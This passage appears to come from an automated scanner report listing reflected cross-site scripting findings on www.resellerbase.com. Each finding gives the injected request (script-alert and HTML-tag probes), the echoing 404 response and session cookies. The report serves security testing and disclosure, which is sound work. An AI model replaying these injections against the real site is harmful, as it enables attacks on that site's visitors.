Path:	/detail/12/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23188<script>alert(1)</script>92691f00f8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1223188<script>alert(1)</script>92691f00f8d/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1223188<script>alert(1)</script>92691f00f8d/search.php was not found on this server.</p>
...[SNIP]...

2.1014. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bca3<script>alert(1)</script>6e712fb3a1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/search.php4bca3<script>alert(1)</script>6e712fb3a1d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php4bca3<script>alert(1)</script>6e712fb3a1d was not found on this server.</p>
...[SNIP]...

2.1015. http://www.resellerbase.com/detail/12/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e4a5d<a>688df8bb7ea was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...&Submit3=Searche4a5d<a>688df8bb7ea&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...&Submit3=Searche4a5d<a>688df8bb7ea&opt=2 was not found on this server.</p>
...[SNIP]...

2.1016. http://www.resellerbase.com/detail/12/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 75315<a>476bd0d6cf0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...75315<a>476bd0d6cf0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...75315<a>476bd0d6cf0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1017. http://www.resellerbase.com/detail/12/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7dc34<script>alert(1)</script>56199da18da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/search.php?7dc34<script>alert(1)</script>56199da18da=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?7dc34<script>alert(1)</script>56199da18da=1 was not found on this server.</p>
...[SNIP]...

2.1018. http://www.resellerbase.com/detail/12/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ab5ac<a>5459d556c62 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...&Submit3=Search&opt=2ab5ac<a>5459d556c62 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...&Submit3=Search&opt=2ab5ac<a>5459d556c62 was not found on this server.</p>
...[SNIP]...

2.1019. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58354<script>alert(1)</script>411df7e3d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58354<script>alert(1)</script>411df7e3d89/12/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58354<script>alert(1)</script>411df7e3d89/12/themes/ was not found on this server.</p>
...[SNIP]...

2.1020. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6b70<script>alert(1)</script>718c3f7c52e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12a6b70<script>alert(1)</script>718c3f7c52e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12a6b70<script>alert(1)</script>718c3f7c52e/themes/ was not found on this server.</p>
...[SNIP]...

2.1021. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a8d5<script>alert(1)</script>8ebe3ed058a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6a8d5<script>alert(1)</script>8ebe3ed058a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1022. http://www.resellerbase.com/detail/12/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8571<script>alert(1)</script>bb102279e0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/?e8571<script>alert(1)</script>bb102279e0f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/?e8571<script>alert(1)</script>bb102279e0f=1 was not found on this server.</p>
...[SNIP]...

2.1023. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 953b8<script>alert(1)</script>c384c2bbfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail953b8<script>alert(1)</script>c384c2bbfa/12/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail953b8<script>alert(1)</script>c384c2bbfa/12/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1024. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 967c3<script>alert(1)</script>9762adc8680 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12967c3<script>alert(1)</script>9762adc8680/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12967c3<script>alert(1)</script>9762adc8680/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1025. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 801fc<script>alert(1)</script>8b8f1adb10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes801fc<script>alert(1)</script>8b8f1adb10/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes801fc<script>alert(1)</script>8b8f1adb10/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1026. http://www.resellerbase.com/detail/12/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 713ee<script>alert(1)</script>1f89060ef92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos713ee<script>alert(1)</script>1f89060ef92/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos713ee<script>alert(1)</script>1f89060ef92/ was not found on this server.</p>
...[SNIP]...

2.1027. http://www.resellerbase.com/detail/12/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62780<script>alert(1)</script>a1a05510276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/?62780<script>alert(1)</script>a1a05510276=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/?62780<script>alert(1)</script>a1a05510276=1 was not found on this server.</p>
...[SNIP]...

2.1028. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52175<script>alert(1)</script>f981271362f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52175<script>alert(1)</script>f981271362f/12/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52175<script>alert(1)</script>f981271362f/12/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1029. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81ec4<script>alert(1)</script>ba5649483a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1281ec4<script>alert(1)</script>ba5649483a4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1281ec4<script>alert(1)</script>ba5649483a4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1030. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6137e<script>alert(1)</script>7c27768a7c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6137e<script>alert(1)</script>7c27768a7c3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes6137e<script>alert(1)</script>7c27768a7c3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1031. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f500<script>alert(1)</script>0b2c64a3411 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos8f500<script>alert(1)</script>0b2c64a3411/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1032. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6da89<script>alert(1)</script>63e2420cfc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images6da89<script>alert(1)</script>63e2420cfc4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images6da89<script>alert(1)</script>63e2420cfc4/ was not found on this server.</p>
...[SNIP]...

2.1033. http://www.resellerbase.com/detail/12/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11ee8<script>alert(1)</script>5a5e6dbcf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/?11ee8<script>alert(1)</script>5a5e6dbcf25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
